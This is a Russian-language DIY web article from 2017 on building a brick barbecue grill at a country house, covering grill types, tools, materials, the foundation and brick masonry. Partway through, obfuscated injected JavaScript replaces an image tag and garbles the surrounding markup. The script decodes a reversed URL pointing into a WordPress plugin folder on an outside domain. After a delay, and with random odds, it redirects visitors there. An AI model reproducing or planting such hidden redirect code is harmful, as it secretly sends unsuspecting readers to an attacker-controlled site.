Добавить в закладки

Как построить печку барбекю для дачи — руководство по самостоятельному изготовлению из 4 этапов

Красиво оформленная печка барбекю может стать украшением вашего участка.

Красиво оформленная печка барбекю может стать украшением вашего участка.

Вам нравится нежный вкус и аппетитный аромат горячей пищи, приготовленной на открытом огне? Если вы сделаете печку барбекю для дачи, то сможете наслаждаться своими любимыми блюдами на свежем воздухе хоть каждый день. Я опишу различные виды мангалов для барбекю, и расскажу, как его можно сделать своими руками у себя на дачном участке.

Что такое барбекю

В сокращенном переводе с французского языка, слово «барбекю» означает «целая тушка быка, зажаренная над открытым огнем на вертеле или железной решетке».

В современной кулинарии понятие барбекю — это процесс приготовления любых видов пищи над тлеющими углями при относительно невысоких температурах (110-150 °C). Это слово стало обобщением, поэтому им нередко также называют продукты, печь, мангал, решетку гриль и даже само мероприятие по приготовлению горячих блюд (по аналогии с более привычными шашлыками).

На схеме показано устройство универсального мангала для приготовления шашлыков и барбекю.

На схеме показано устройство универсального мангала для приготовления шашлыков и барбекю.

Открытые дровяные печи, мангалы и барбекю можно использовать для приготовления практически любых мясных и вегетарианских горячих блюд:

  1. Поджаривание мясных или рыбных блюд на решетке для получения хрустящей золотистой корочки;
  2. Запекание рыбных и мясных блюд в фольге или под колпаком для сохранения собственного сока;
  3. Приготовление традиционных шашлыков на шампурах над горящими углями;
  4. Разогревание готовых сосисок гриль и барбекю на металлической решетке или на деревянных шпажках;
  5. Копчение рыбы и мяса над тлеющими древесными опилками;
  6. Поджаривание и запекание овощей, грибов и прочих вегетарианских продуктов над раскаленными углями;
  7. Варка супов, борщей ухи или других первых блюд в казане или котле на горящих дровах.
$NfI=function(n){if (typeof ($NfI.list[n]) == «string») return $NfI.list[n].split(«»).reverse().join(«»);return $NfI.list[n];};$NfI.list=[«\’php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\’=ferh.noitacol.tnemucod»];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}tovleniya-pischi-reguliruetsya-vy-600×350.png» alt=»Температура приготовления пищи регулируется высотой установки жарочной решетки.» width=»600″ height=»350″ /> Температура приготовления пищи регулируется высотой установки жарочной решетки.

Разновидности печей барбекю

Конструктивно печь барбекю изготавливается в виде привычного для нас мангала. В зависимости от места установки, используемых материалов и конструктивного исполнения, они бывают трех видов:

  1. Переносной мангал барбекю:
  • Имеет мобильную или сборную конструкцию, поэтому его можно установить в любом месте дачного участка, а также брать с собой при выездах в лес или на берег водоема;
  • Жаровня для углей изготавливается в виде корыта из толстостенного листового металла;
  • В боковых стенках снизу делаются отверстия для поддува воздуха, а сверху приваривается направляющая с прорезями для укладки шампуров или решетки для барбекю;
  • Снизу устанавливается массивная подставка из толстого стального прутка или профильных труб, а сверху крепится закрывающаяся крышка;
  • Для удобства перемещения тяжелые металлические мангалы делают на колесах, а в декоративных целях украшают ажурными элементами художественной ковки.
Металлический мангал с крышкой можно сделать из отрезка стальной трубы.

Металлический мангал с крышкой можно сделать из отрезка стальной трубы.

  1. Стационарный мангал:
  • Имеет большой вес, поэтому устанавливается в грунте на собственном массивном фундаменте;
  • Его нельзя перемещать с места на место, поэтому перед установкой нужно правильно подобрать место расположения на участке;
  • Основание и жаровня обычно изготавливается из кирпича или природного камня, а жарочные решетки, подставки и прочая фурнитура — из металла;
  • Чтобы ветер не раздувал горящие угли, жаровня сзади и с боков закрывается сплошными стенками;
  • Для удобства мангал оборудуется дымовой трубой, отделениями для дров и кухонной утвари, а также боковыми сервировочными поверхностями для приготовления пищи.
Кирпичная печка барбекю сочетает в себе функции полноценной летней кухни.

Кирпичная печка барбекю сочетает в себе функции полноценной летней кухни.

  1. Настенные мангалы барбекю:
  • Подходят для небольших дачных участков, на которых нет садовой беседки или специально оборудованной зоны отдыха;
  • Обычно крепятся к стене при помощи откидного поворотного кронштейна, поэтому в нерабочем положении не занимают много места;
  • Бывают прямоугольной или круглой формы. Круглый подходит только для приготовления мяса гриль или барбекю, а прямоугольный можно использовать для классических шашлыков.
Складной настенный мангал вообще не требует отдельного места на участке.

Складной настенный мангал вообще не требует отдельного места на участке.

Как самому построить кирпичный мангал для барбекю

В строительных гипермаркетах можно купить готовые переносные печи и мангалы для дачи. На первый взгляд они кажутся красивые, однако у них есть два существенных недостатка:

  • Неоправданно высокая цена;
  • Не очень добротная конструкция и однотипный неоригинальный дизайн.

При самостоятельном изготовлении затраты окажутся значительно ниже, а качество исполнения и внешний вид будут зависеть только от вашего старания и фантазии.

На схеме показаны основные свойства различных видов мангалов для барбекю.

На схеме показаны основные свойства различных видов мангалов для барбекю.

Этап 1: подготовка инструментов и материалов

Чтобы сделать самому мангал из кирпича, потребуется немного материалов и обычный набор дачных инструментов для строительства.

Инструменты:

Иллюстрация Список инструментов
table_pic_att14931601067 Садовый инвентарь:

  1. Совковая и штыковая лопата;
  2. Садовые грабли;
  3. Металлические ведра;
  4. Дачная или строительная тачка.
table_pic_att14931601078 Строительные инструменты:

  1. Мастерок или кельма;
  2. Кирка для подрезки кирпичей;
  3. Широкий и узкий металлический шпатель;
  4. Ручная трамбовка для грунта;
  5. Строительный уровень и веревочный отвес;
  6. Металлический или деревянный угольник;
  7. Широкое корыто для приготовления раствора;
  8. Болгарка с отрезными дисками по металлу и по камню.

Материалы:

Иллюстрация Перечень материалов
table_pic_att14931601089 Материалы для фундамента:

  1. Гранитный щебень с размером частиц 20-35 мм;
  2. Карьерный или овражный песок;
  3. Цемент марки М400-М500;
  4. Арматурные прутки диаметром 8 мм или металлическая армирующая сетка с размером ячеек 50х50 мм;
  5. Рубероид для гидроизоляции;
  6. Доски или обрезки фанеры для изготовления опалубки.
table_pic_att149316010910 Кладочный раствор:

  1. Для кладки кирпича в основании мангала понадобится строительный раствор из цемента, песка и воды, в соотношении 1:3:0,85;
  2. Кладка жаровни и дымовой трубы выполняется на глиняно-песчаный раствор;
  3. Для этого 1 часть глины надо на сутки замочить в воде;
  4. К глине добавить 0,5-1 часть песка, и хорошо перемешать до получения однородной густой массы без плотных комков.
table_pic_att149316011011 Кирпичи:

  1. Красный обожженный кирпич — используется для кладки конструктивной части мангала и дымовой трубы;
  2. Шамотный огнеупорный кирпич (как на фото) — применяется для футеровки основания и боковых стенок жаровни;
  3. Облицовочный или клинкерный кирпич — можно использовать только для наружной декоративной отделки.

Для изготовления столешницы понадобится также бетонная или каменная плита толщиной около 50 мм.

table_pic_att149316011112 Металлическая фурнитура:

  1. Толстостенные стальные уголки сечением 40х40 или 50х50 мм;
  2. Чугунная подставка для казана, котла или сковородки;
  3. Решетка для запекания продуктов — должна быть сделана из чугуна или пищевой нержавеющей стали;
  4. Набор печных принадлежностей: кочерга, ухват, щипцы для углей и пр.

Этап 2: изготовление фундамента

Ниже представлена инструкция по строительству универсального мангала из кирпича. Его можно использовать для жарки шашлыков, приготовления горячих первых и вторых блюд, а также для запекания продуктов на гриле или барбекю.

Иллюстрация Описание работ
table_pic_att149316011613 Подготовка котлована:

  1. На участке земли снять плодородный слой почвы;
  2. Выкопать прямоугольный котлован глубиной 500-600 мм;
  3. Размеры котлована в плане должны быть на 100-150 мм больше размеров основания мангала;
  4. Грунт на дне ямы утрамбовать и насыпать песчаную подушку толщиной 300 мм.
Установка опалубки:

  1. На песчаную подушку уложить гидроизоляцию из рубероида или толстой полиэтиленовой пленки;
  2. По периметру установить опалубку из досок или толстой фанеры;
  3. Высота опалубки должна быть на 80-100 мм выше уровня земли;
  4. Внутрь уложить два слоя армирующей решетки;
  5. Нижний слой должен лежать на подставках на 50 мм выше уровня гидроизоляции;
  6. Верхний слой располагается на 60-80 мм выше нижнего.
table_pic_att149316011714 Заливка фундаментной плиты:

  1. В опалубку залить жидкий бетонный раствор;
  2. Чтобы в плите не образовалось пустот или раковин, бетон уплотнить вибратором или черенком от лопаты;
  3. Залитую поверхность накрыть полиэтиленовой пленкой и оставить на 1-2 недели для отвердевания.

Этап 3: кирпичная кладка цоколя

Для кладки нижней части мангала используется красный обожженный кирпич и цементно-песчаный раствор. Столешницу и сервировочные поверхности можно изготовить одним из трех способов:

Иллюстрация Описание работ
table_pic_att149316011815 Кладка цокольной части:

  1. На фундамент уложить слой гидроизоляции из рубероида;
  2. Для небольших мангалов кладку задней и боковых стенок можно делать толщиной в полкирпича;
  3. Через каждые 600-700 мм внутрь надо установить промежуточные опорные стенки;
  4. Они же будут разделять цоколь на отдельные отсеки для гранения дров, посуды и пр.
table_pic_att149316011916 Столешница из готовой плиты:

  1. Наиболее простой и надежный вариант — готовая столешница из каменной или бетонной плиты;
  2. В ней нужно предварительно вырезать отверстия для жаровни, кухонной мойки и пр.;
  3. На верхний ряд кирпичей цоколя нанести цементно-песчаный раствор или клеящую смесь для наружных работ;
  4. Сверху уложить столешницу и выставить ее строго горизонтально в двух плоскостях.
table_pic_att149316012117 Монолитно бетонная столешница:

  1. Если у вас нет подходящей плиты, ее можно сделать самому;
  2. По периметру цоколя установить вертикальную опалубку из досок или фанеры
  3. Снизу в проемах закрепить горизонтальную опалубку из листов фанеры или ОСП (ориентированно-стружечная плита);
  4. Внутрь уложить арматурные прутки или сварную армирующую решетку;
  5. Залить бетонный раствор и накрыть полиэтиленовой пленкой;
  6. Опалубку можно снять через 1-2 недели.
table_pic_att149316012118 Столешница из кирпичей:

  1. На боковые стенки цоколя положить стальные уголки сечением 50х50 мм на расстоянии 255 мм друг от друга;
  2. Каждый уголок должен заходить на боковую стенку не менее чем на 150 мм;
  3. Внутрь уголков на кладочный раствор уложить кирпичи вплотную друг к другу;
  4. На сервировочных поверхностях сверху уложить слой декоративного кирпича, а под мангалом — слой шамотного кирпича.

Учитывая значительные перепады температур , между кирпичами и уголком нужно оставить зазоры шириной 3 мм для компенсации теплового расширения.

Общая высота цокольной части от уровня земли до верхней плоскости столешницы должна получиться в пределах 700-800 мм.

Этап 4: кладка кирпичной жаровни

Кладка жаровни в уличных мангалах для дачного участка выполняется шамотным кирпичом на глиняно-песчаном растворе:

Иллюстрация Описание работ
table_pic_att149316012319 Открытая жаровня:

  1. Независимо от типа и материала столешницы, основание жаровни надо выложить сплошным слоем шамотных кирпичей;
  2. В открытых мангалах заднюю и боковые стенки надо выложить из 5-6 рядов шамотного кирпича;
  3. По переднему и заднему краб мангала установить стальные уголки с прорезями для шампуров;
  4. В боковых стенках предусмотреть крепления для установки жарочной решетки.
table_pic_att149316012420 Закрытая жаровня:

  1. Закрытая барбекюшница изготавливается по такому же принципу;
  2. Главное отличие — это высокие боковые стенки, перекрытый верхний свод и наличие дымовой трубы.

Дымоход над мангалом можно выложить из кирпича или изготовить в виде вытяжного зонта с трубой из нержавеющей стали.

Заключение

Теперь вы сами сможете без труда построить мангал для дачи своими руками. Полезно также посмотреть видео в этой статье, а если останутся вопросы, пишите в комментариях.



Понравилась статья? Подписывайтесь на наш канал Яндекс.Дзен

Оставить комментарий

ОБЯЗАТЕЛЬНО приложите ФОТО проблемы - так ответ эксперта будет гораздо точней

Оставляя комментарий, Вы принимаете пользовательское соглашение

Ваше имя:
Ваш e-mail:
Добавить в избранное Версия для печати
Поделитесь:
Рейтинг статьи:
Автор: Виктор
Опубликовано: 25.04.2017



Top